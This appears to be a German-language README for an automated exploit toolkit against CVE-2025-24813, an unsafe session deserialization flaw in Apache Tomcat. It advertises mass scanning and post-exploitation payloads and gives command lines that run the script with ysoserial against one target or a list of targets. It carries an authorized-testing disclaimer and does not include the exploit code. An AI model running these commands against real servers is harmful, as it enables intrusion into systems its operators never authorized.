
Automatisiertes Exploitation-Toolkit für CVE-2025-24813, gezielt gegen unsichere Session-Deserialisierung in Apache Tomcat. Bietet Multi-Target-Scanning, Gadget-Chain-Tests, Betriebssystemerkennung und Post-Exploitation-Payloads.
Dies ist ein fortschrittliches und automatisiertes Exploitation-Tool für CVE-2025-24813, das auf Apache Tomcat-Server abzielt, die anfällig für unsichere Session-Deserialisierung sind.
--targets / --url)# Single target
python3 exploit_cve_2025_24813.py \
--url http://target:8080 \
--ysoserial ysoserial.jar \
--no-ssl-verify
# Multiple targets from file
python3 exploit_cve_2025_24813.py \
--targets targets.txt \
--ysoserial ysoserial.jar \
--no-ssl-verify
Python 3.6+
Java-Laufzeitumgebung (für ysoserial)
ysoserial Java-Binärdatei
Dieses Tool wird ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Jegliche unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist strengstens untersagt und kann illegal sein. 📚 Danksagungen
Dieses Projekt wurde von einem öffentlichen PoC inspiriert, der unter der Apache License 2.0 veröffentlicht wurde. Ursprünglicher PoC-Autor: absholi7ly Erweitert und neu geschrieben von mehrdad mirabi